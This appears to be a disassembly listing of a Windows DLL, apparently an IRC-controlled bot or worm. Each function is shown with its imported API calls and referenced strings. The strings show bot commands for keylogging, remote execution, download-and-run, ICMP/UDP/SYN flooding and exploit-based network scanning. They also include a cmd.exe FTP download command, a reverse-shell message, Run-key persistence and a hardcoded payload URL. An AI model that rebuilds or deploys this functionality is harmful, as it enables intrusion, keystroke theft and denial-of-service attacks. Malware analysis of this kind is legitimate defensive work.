_DllMain12():
	KERNEL32.GetModuleFileNameA

sub_outside():
	MSVCRT.strlen
	MSVCRT.ceil
	MSVCRT._ftol
	MSVCRT.strncpy
	KERNEL32.GetTempPathA
	KERNEL32.GetTempFileNameA
	KERNEL32.CreateFileA
	KERNEL32.ReadFile
	MSVCRT._snprintf
	KERNEL32.CloseHandle
	KERNEL32.CreateToolhelp32Snapshot
	KERNEL32.Process32First
	KERNEL32.Process32Next
	MSVCRT._stricmp
	KERNEL32.GetTickCount
	MSVCRT.srand
	WS2_32.inet_addr
	KERNEL32.ExitThread
	WS2_32.socket
	WS2_32.setsockopt
	WS2_32.closesocket
	MSVCRT.memset
	WS2_32.sendto

sub_10001059(01b3):
	MSVCRT.malloc
	MSVCRT.memset
	MSVCRT.memcpy

sub_10004608(07b4):
	MSVCRT.rand

sub_10006D53(0b3a):
	MSVCRT.malloc
	WS2_32.htons
	MSVCRT.rand
	MSVCRT.memcpy
	MSVCRT.free

sub_1000AB26(0e84):
	KERNEL32.CloseHandle
	MSVCRT.memset

sub_1000998F(0fa1):
	KERNEL32.CreateToolhelp32Snapshot
	KERNEL32.Process32First
	KERNEL32.Process32Next
	MSVCRT._stricmp
	KERNEL32.OpenProcess
	KERNEL32.TerminateProcess
	KERNEL32.CloseHandle
	KERNEL32.Sleep

	"%s (%d)"

sub_100019DF(1945):
	MSVCRT.malloc
	MSVCRT.memset
	MSVCRT.memcpy
	MSVCRT.free

sub_10004C65(1f84):
	MSVCRT._beginthreadex

sub_100024A5(215d):
	MSVCRT.memset
	MSVCRT.strtok
	MSVCRT.strlen
	MSVCRT._snprintf
	WS2_32.send
	MSVCRT.strncpy
	KERNEL32.FindFirstFileA
	KERNEL32.FindNextFileA
	MSVCRT.strcmp
	KERNEL32.FileTimeToLocalFileTime
	KERNEL32.FileTimeToSystemTime
	KERNEL32.FindClose

	"\n"
	"\r\n"
	"\r\n"
	"\r\n"
	"\r\n"
	"\r\n"
	"\r\n"
	"\r\n"
	"\r\n"
	"%s Sending exploit.."
	"%s.dll"
	"cmd.exe /C echo open %s %hu>x&echo user"...
	"%.29s>/"
	"\">%s/"
	"

StartAddress(2206):
	MSVCRT.strncpy
	KERNEL32.GetDateFormatA
	KERNEL32.GetTimeFormatA
	MSVCRT._snprintf
	MSVCRT.strlen
	WS2_32.send
	WS2_32.closesocket
	KERNEL32.ExitThread

	"text/html"
	"application/octet-stream"
	"ddd, dd	MMM yyyy"
	"HH:mm:ss"
	"HTTP/1.0 200 OK\r\nServer: HTTPd\r\nCache-C"...
	"HTTP/1.0 200 OK\r\nServer: HTTPd\r\nCache-C"...
	"%s Sending exploit.."
	"%s.dll"
	"cmd.exe /C echo open %s %hu>x&echo user"...

sub_10007398(337f):
	MSVCRT.strncpy

sub_1000A50C(351d):
	WS2_32.socket
	MSVCRT._endthreadex
	WS2_32.htons
	MSVCRT.memset
	WS2_32.bind
	KERNEL32.Sleep
	WS2_32.listen
	WS2_32.accept
	WS2_32.inet_ntoa
	MSVCRT._snprintf
	MSVCRT.strlen
	WS2_32.send
	WS2_32.closesocket

	"[+] Got reverse shell	connection from	%"...
	"%s.dll"
	"echo open %s %hu>x&echo user x x>>x&ech"...

sub_10009B22(3858):
	MSVCRT.sscanf
	MSVCRT._snprintf
	MSVCRT.strcmp
	WS2_32.inet_addr

	"%d.%d.%d.%d"
	"%d.%d.%d.%d"

sub_10005C3D(38c1):
	WS2_32.socket
	WS2_32.setsockopt
	WS2_32.ioctlsocket
	WS2_32.htons
	MSVCRT.memset
	WS2_32.bind
	MSVCRT._endthreadex
	WS2_32.listen
	WS2_32.select
	WS2_32.__WSAFDIsSet
	WS2_32.accept
	WS2_32.ntohl
	WS2_32.inet_addr
	MSVCRT.strlen
	WS2_32.send
	WS2_32.recv
	WS2_32.closesocket
	MSVCRT.sscanf
	MSVCRT.strcmp
	MSVCRT.atoi
	MSVCRT._snprintf
	MSVCRT.strtoul

	"220 Welcome to FTPd\n"
	"61.251.128.0"
	"61.251.128.255"
	"210.93.224.0"
	"210.93.224.255"
	"%s %s"
	"USER"
	"331 Password required\n"
	"PASS"
	"230 User	logged in\n"
	"SYST"
	"REST"
	"PWD"
	"257 \"/\" is current directory\n"
	"TYPE"
	"A"
	"TYPE"
	"I"
	"PASV"
	"425 Passive not supported on this serve"...
	"LIST"
	"226 Transfer complete\n"
	"PORT"
	"200 PORT	command	successful\n"
	"%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
	"%x%x\n"
	"%s.%s.%s.%s"
	"RETR"
	"150 Opening BINARY mode data connection"...
	"226 Transfer complete\n"
	"425 Can't open data connection\n"
	"ftp transfer complete	to %s"
	"QUIT"

sub_10004987(3a73):
	MSVCRT.malloc
	KERNEL32.GetSystemDirectoryA
	KERNEL32.GlobalMemoryStatus
	KERNEL32.GetVersionExA
	MSVCRT._snprintf
	KERNEL32.GetTickCount
	KERNEL32.GetComputerNameA
	ADVAPI32.GetUserNameA

	"95"
	"NT"
	"98"
	"ME"
	"2000"
	"XP"
	"???"
	"%s (%s)"
	"OS: Windows %s (%d.%d	- %d), CPU: %dMHz"...

sub_10006BAC(401c):
	MSVCRT.malloc
	MSVCRT.memset
	WS2_32.htons
	MSVCRT.rand
	MSVCRT.memcpy
	MSVCRT.free

sub_10007303(4110):
	MSVCRT._vsnprintf
	MSVCRT._snprintf
	MSVCRT.strcat
	MSVCRT.strlen
	WS2_32.send

	"PRIVMSG %s	:%s"
	"\r\n"

sub_1000A858(4527):
	KERNEL32.Sleep

	"%d. %s (%s)"

start(4d30):
	WININET.InternetOpenA
	WININET.InternetOpenUrlA
	MSVCRT.fopen
	WININET.InternetReadFile
	MSVCRT.fwrite
	MSVCRT.fclose
	SHELL32.ShellExecuteA
	KERNEL32.SetErrorMode
	KERNEL32.GetTickCount
	MSVCRT.srand
	KERNEL32.CreateMutexA
	KERNEL32.WaitForSingleObject
	MSVCRT.memset
	WS2_32.WSAStartup
	KERNEL32.Sleep
	WS2_32.recv
	MSVCRT.strncpy
	MSVCRT._snprintf
	MSVCRT.strlen

	"WebReader"
	"http://adware.rxmods.net/adware.exe"
	"wb"
	"c:\\adware.exe"
	"c:\\adware.exe"
	"open"
	"%s%s"

sub_1000180B(4e25):
	WS2_32.select
	WS2_32.__WSAFDIsSet
	WS2_32.recv

sub_10005AE8(4e88):
	MSVCRT.strncpy
	KERNEL32.CreateFileA
	KERNEL32.GetFileSize
	MSVCRT.memset
	KERNEL32.SetFilePointer
	KERNEL32.ReadFile
	WS2_32.send
	WS2_32.WSAGetLastError
	KERNEL32.CloseHandle
	WS2_32.closesocket

sub_10007005(55fa):
	KERNEL32.GetVersionExA
	KERNEL32.GetTickCount
	MSVCRT.srand
	WS2_32.closesocket
	WS2_32.socket
	WS2_32.inet_addr
	MSVCRT.atoi
	WS2_32.htons
	MSVCRT.memset
	WS2_32.connect
	MSVCRT.strncpy

	"USER	%s \"\"	\"\" :%s"
	"NICK	|%s%s%s"
	"PASS	%s"

sub_10009CEB(59aa):
	WS2_32.socket
	WS2_32.htons
	MSVCRT.memset
	WS2_32.connect
	WS2_32.closesocket
	WS2_32.recv
	MSVCRT._snprintf
	MSVCRT.strlen
	WS2_32.send

	"%s.dll"
	"echo open %s %hu>x&echo user x x>>x&ech"...

sub_1000329E(653f):
	WS2_32.htons
	MSVCRT.memset
	WS2_32.socket
	WS2_32.bind
	WS2_32.listen
	WS2_32.ioctlsocket
	WS2_32.select
	WS2_32.__WSAFDIsSet
	WS2_32.accept
	WS2_32.recv
	WS2_32.closesocket
	MSVCRT.strlen
	MSVCRT.strstr
	MSVCRT.strtok
	MSVCRT.strncpy
	MSVCRT.strcmp
	MSVCRT._snprintf
	KERNEL32.ExitThread

	"GET "
	"	"
	"	"
	"GET "
	"\r\n"
	"%s Sending exploit.."
	"%s.dll"
	"cmd.exe /C echo open %s %hu>x&echo user"...

sub_10004EA7(6563):
	KERNEL32.GetSystemDirectoryA
	KERNEL32.GetTempPathA
	MSVCRT._snprintf
	MSVCRT._stricmp
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegDeleteValueA
	KERNEL32.SetFileAttributesA
	KERNEL32.CreateFileA
	MSVCRT.strlen
	KERNEL32.WriteFile
	KERNEL32.CloseHandle
	SHELL32.ShellExecuteA
	MSVCRT.exit

	"%s\\%s"
	"%suninstall.bat"
	"WinDLL (%s)"
	"Software\\Microsoft\\Windows\\CurrentVersi"...
	"@echo	off\r\n:1\r\ndel \"%s\"\r\nif exist \"%s\" "...
	"open"

sub_10004763(68d3):
	WS2_32.gethostbyname

sub_10007293(6c89):
	MSVCRT._vsnprintf
	MSVCRT.strcat
	MSVCRT.strlen
	WS2_32.send

	"\r\n"

sub_10001991(7786):
	WS2_32.htonl
	WS2_32.send

sub_10001C45(781c):
	MSVCRT._ftol
	MSVCRT.floor

sub_1000504C(84eb):
	"7XoarEdQ6LsNv624U2PBS4Eyx7S5WzhL7gw3am4"...
	"7XoarEdQ6LsNv624U2PBS4Eyx7S5WzhL7gw3am4"...
	"7XoarEdQ6LsNv624U2PBS4Eyx7S5WzhL7gw3am4"...
	"7XoarEdQ6LsNv624U2PBS4Eyx7S5WzhL7gw3am4"...
	"\a:zuvj|:"
	"7XoarEdQ6LsNv624U2PBS4Eyx7S5WzhL7gw3am4"...
	"7XoarEdQ6LsNv624U2PBS4Eyx7S5WzhL7gw3am4"...
	"7XoarEdQ6LsNv624U2PBS4Eyx7S5WzhL7gw3am4"...
	"\b:zuvj|:("
	"7XoarEdQ6LsNv624U2PBS4Eyx7S5WzhL7gw3am4"...
	"\vnpwFju+7|a|"
	"7XoarEdQ6LsNv624U2PBS4Eyx7S5WzhL7gw3am4"...

sub_10001368(8707):
	MSVCRT.strlen

sub_100030D9(8743):
	KERNEL32.CreateFileA
	KERNEL32.GetFileSize
	MSVCRT._snprintf
	MSVCRT.memset
	KERNEL32.SetFilePointer
	KERNEL32.ReadFile
	WS2_32.send
	WS2_32.WSAGetLastError
	KERNEL32.CloseHandle

	"%s Sending exploit.."
	"%s.dll"
	"cmd.exe /C echo open %s %hu>x&echo user"...

sub_10002110(8a0a):
	MSVCRT.strlen

sub_10004BF7(8fb7):
	MSVCRT.sscanf

	"%d.%d.%d.%d"

sub_10001170(9980):
	MSVCRT.malloc
	MSVCRT.memset
	MSVCRT.memcpy
	MSVCRT.free

sub_10006A3B(9a4b):
	MSVCRT.malloc
	MSVCRT.memset
	WS2_32.htons
	MSVCRT.rand
	MSVCRT.memcpy
	MSVCRT.free

sub_1000B122(a863):
	MSVCRT.sscanf
	MSVCRT._snprintf
	MSVCRT.strcmp
	WS2_32.inet_addr

	"%d.%d.%d.%d"
	"%d.%d.%d.%d"
	"%d.%d.%d.%d"

sub_10004BB5(a892):
	MSVCRT.malloc
	MSVCRT._snprintf

	"IP: %s, connected from: %s (%s)"

sub_100010BA(acaa):
	MSVCRT.malloc
	MSVCRT.memset
	MSVCRT.memcpy

sub_10005191(aeb6):
	MSVCRT.strlen

sub_1000113B(afe6):
	MSVCRT.free

sub_10001433(b527):
	MSVCRT.memset

	"�B�B�B�B"
	"CCCC"

sub_10006FA2(b83e):
	MSVCRT.malloc

sub_10007424(ba9e):
	MSVCRT.memset
	MSVCRT._stricmp
	MSVCRT.strncpy
	WS2_32.inet_addr
	WS2_32.inet_ntoa
	MSVCRT._snprintf
	KERNEL32.GetTickCount
	MSVCRT.atol
	MSVCRT.exit
	MSVCRT.strcmp
	MSVCRT.strstr
	SHELL32.ShellExecuteA
	KERNEL32.DeleteFileA
	MSVCRT.atoi
	KERNEL32.Sleep
	KERNEL32.CreateThread
	KERNEL32.GetTempPathA
	KERNEL32.GetSystemDirectoryA
	MSVCRT._splitpath
	MSVCRT.srand
	KERNEL32.GetComputerNameA
	KERNEL32.GetVersionExA
	KERNEL32.GetLocaleInfoA
	MSVCRT.sscanf
	USER32.GetAsyncKeyState
	USER32.GetKeyboardLayout
	USER32.MapVirtualKeyExA
	USER32.GetKeyNameTextA
	MSVCRT.strlen
	KERNEL32.GetTempFileNameA
	KERNEL32.CreateFileA
	KERNEL32.ReadFile

	"PING"
	"PONG	%s"
	"001"
	"USERHOST %s"
	"JOIN	%s %s"
	"302"
	"433"
	"NICK	%s"
	"NICK"
	"KICK"
	"JOIN %s %s"
	"PRIVMSG"
	"332"
	"PRIVMSG"
	":%s PRIVMSG %s :%s"
	"332"
	":%s 332 %s %s :%s"
	"*@fbi.gov"
	"332"
	"botid"
	"{BOTID}: %s..."
	"uptime"
	"{UPTIME}: %lud %luh %lum..."
	"sysinfo"
	"{SYSINFO}: %s..."
	"netinfo"
	"{NETINFO}: %s..."
	"reconnect"
	"QUIT"
	"exit"
	"QUIT"
	"remove"
	"QUIT"
	"raw"
	" %s"
	"{RAW}: %s..."
	"open"
	" %s"
	"open"
	"{OPEN}: Opened file %s..."
	"exec"
	" %s"
	"/C %s"
	"cmd.exe"
	"open"
	"{EXECUTE}: Executed file %s..."
	"delete"
	" %s"
	"{DELETED}: FILE %s..."
	"speedtest"
	"speedtest"
	"downlow"
	"{DOWNLOADING}: Downloading file..."
	"download"
	"icmp"
	"icmpflood"
	"ICMP-Flooding	%s for %s seconds."
	"udp"
	"udpflood"
	"UDP-Flooding %s on port %s for %s secon"...
	"syn"
	"synflood"
	"%s SYN-Flooding %s on	port %s	for %s se"...
	"ddosstop"
	"icmpflood"
	"udpflood"
	"synflood"
	"DDOS FLOOD HAS STOPPED"
	"update"
	"exe"
	"dll"
	"%s\\%s.%s"
	"{UPDATING}: Updated file... [FILE: %s]"
	"update"
	"!httpd"
	"{EXPLOITED-HTTP}: Started on %s:83...\r\n"...
	"tl"
	"tk"
	"{THREADS}: Killed thread %s..."
	"kpid"
	"{THREADS}: Killed thread %s..."
	"kat"
	"{THREADS}: Killed all	threads..."
	"pslist"
	"pskill"
	"pskillpid"
	"httpserver"
	"{HTTPSERVER}:	%s:%s...\r\n"
	"httpd"
	"uinfo"
	"PC"
	"PC"
	"PC"
	"WINDOWS 95"
	"WINDOWS NT"
	"WINDOWS 98"
	"WINDOWS ME"
	"WINDOWS 2K"
	"WINDOWS XP"
	"WINDOWS 2K3"
	"UNKNOWN"
	"{USERINFO}: Country %s operating system"...
	"scan"
	"asn"
	"asn"
	"%d.%d.%d.%d"
	"{SCANNING}: %d.x.x.x - %d.%d.x.x..."
	"netapi"
	"netapi"
	"%d.%d.%d.%d"
	"{SCANNING}: %d.x.x.x - %d.%d.x.x..."
	"{SCANNING}: Failed..."
	"%d.%d.%d.%d"
	"%d.%d.%d.%d"
	"%d.x.x.x"
	"%d.%d.x.x"
	"%d.%d.%d.x"
	"%d.%d.x.x"
	"scan"
	"keylog"
	"\r\n"
	"{KEYLOG}:%s\r\n"
	"scanstop"
	"scan"
	"{SCANSTOP}: Stopped scanning... :%d: Ro"...
	"!eip"
	"Temp"
	"{EXTERNAL-IP}	%s..."
	"scanstats"
	"{SCANSTATS}: Exploits	%d..."

sub_10001BDB(bdf8):
	WS2_32.send

	"�"

sub_10005A70(c572):
	WS2_32.socket
	WS2_32.inet_addr
	WS2_32.htons
	MSVCRT.memset
	WS2_32.connect
	WS2_32.closesocket

sub_10009949(c58f):
	KERNEL32.OpenProcess
	KERNEL32.TerminateProcess
	KERNEL32.CloseHandle

sub_10005380(c8b9):
	WININET.InternetOpenA
	WININET.InternetOpenUrlA
	KERNEL32.CreateFileA
	MSVCRT._endthreadex
	WININET.InternetReadFile
	KERNEL32.WriteFile
	KERNEL32.CloseHandle
	WININET.InternetCloseHandle
	SHELL32.ShellExecuteA
	MSVCRT._snprintf

	"Mozilla/4.0 (compatible)"
	"open"
	"%s,start"
	"rundll32.exe"
	"open"
	"QUIT"
	"open"

sub_1000495F(ca52):
	WS2_32.gethostbyaddr

sub_10004C83(d0e9):
	WS2_32.getsockname
	MSVCRT._snprintf

	"%d.%d.%d.%d"

sub_1000A8D0(d4a5):
	MSVCRT.strcmp
	KERNEL32.TerminateThread
	KERNEL32.CloseHandle
	MSVCRT.memset

sub_1000A7E9(de5a):
	MSVCRT.strcmp

sub_10005584(e06d):
	WININET.InternetOpenA
	MSVCRT.malloc
	WININET.InternetCrackUrlA
	WININET.InternetConnectA
	WININET.FtpOpenFileA
	MSVCRT.memset
	KERNEL32.GetTickCount
	WININET.InternetWriteFile
	WININET.InternetCloseHandle
	MSVCRT.free
	MSVCRT._endthreadex

	"Mozilla/4.0 (compatible)"
	"speed.test"
	"speedtest complete (upload speed: %luKB"...

sub_1000AA09(e390):
	KERNEL32.TerminateThread
	KERNEL32.CloseHandle
	MSVCRT.memset

sub_10009E30(e4a0):
	WS2_32.inet_addr
	WS2_32.socket
	WS2_32.setsockopt
	MSVCRT.memset
	WS2_32.sendto
	WS2_32.closesocket

sub_1000B442(e4d9):
	KERNEL32.GetTickCount
	MSVCRT.srand
	WS2_32.inet_addr
	KERNEL32.ExitThread
	WS2_32.socket
	WS2_32.setsockopt
	WS2_32.closesocket
	MSVCRT.memset
	WS2_32.sendto

sub_1000B205(ee08):
	KERNEL32.GetTickCount
	MSVCRT.srand
	WS2_32.inet_addr
	KERNEL32.ExitThread
	WS2_32.socket
	WS2_32.setsockopt
	WS2_32.closesocket
	MSVCRT.memset
	WS2_32.sendto

sub_10009EF0(f37a):
	KERNEL32.GetTickCount
	MSVCRT.srand
	MSVCRT._endthreadex
	MSVCRT.strcmp
	MSVCRT._itoa
	KERNEL32.Sleep
	KERNEL32.CloseHandle

	"msdtc"
	"rshell"
	"rshell"

sub_10001EBF(f3a6):
	MSVCRT.memcpy
	MSVCRT._snprintf
	MSVCRT._endthreadex
	WS2_32.socket
	WS2_32.htons
	MSVCRT.memset
	WS2_32.connect
	WS2_32.closesocket

	"%s.dll"
	"cmd.exe /C echo open %s %hu>x&echo user"...
	"SVWf��"

sub_10004631(f3cd):
	KERNEL32.Sleep

sub_1000A1A9(f623):
	WS2_32.socket
	MSVCRT._endthreadex
	WS2_32.inet_addr
	MSVCRT.memset
	WS2_32.bind
	WS2_32.closesocket
	WS2_32.ioctlsocket
	WS2_32.recv
	WS2_32.ntohs
	MSVCRT.strcmp
	KERNEL32.CloseHandle
	KERNEL32.Sleep
	WS2_32.inet_ntoa

	"asn"
	"netapi"
	"%hu |	Attempting to exploit %s"

sub_10009C30(f67a):
	MSVCRT._itoa
	KERNEL32.Sleep

	"ftpd"
	"ftpd"

sub_10004CE4(f798):
	KERNEL32.GetSystemDirectoryA
	MSVCRT._snprintf
	MSVCRT._stricmp
	KERNEL32.CopyFileA
	KERNEL32.Sleep
	SHELL32.ShellExecuteA

	"%s\\%s"
	"%s,start"
	"rundll32.exe"
	"open"

sub_10002157(fb4c):
	MSVCRT.memset
	MSVCRT._snprintf
	MSVCRT.strncpy
	MSVCRT.strlen
	MSVCRT.strtok
	KERNEL32.GetFileAttributesA
	WS2_32.closesocket
	MSVCRT.strncat
	KERNEL32.CreateFileA
	KERNEL32.GetFileSize
	KERNEL32.CloseHandle
	KERNEL32.CreateThread
	KERNEL32.Sleep

	"\\%s"
	"%s%s"
	"\n"
	"*"

sub_1000A752(fc12):
	MSVCRT.strncpy

sub_10003D60(fe0b):
	WS2_32.socket
	MSVCRT._endthreadex
	WS2_32.htons
	MSVCRT.memset
	WS2_32.connect
	WS2_32.sendto
	WS2_32.recv
	WS2_32.closesocket

	"�"

sub_10004DB1(ff6d):
	KERNEL32.GetSystemDirectoryA
	MSVCRT._snprintf
	ADVAPI32.RegCreateKeyExA
	MSVCRT.strlen
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey
	KERNEL32.SetFileAttributesA

	"WinDLL (%s)"
	"%s\\%s"
	"rundll32.exe %s,start"
	"Software\\Microsoft\\Windows\\CurrentVersi"...

sub_1000127E(ff79):
	MSVCRT.malloc
	MSVCRT.memset
	MSVCRT.memcpy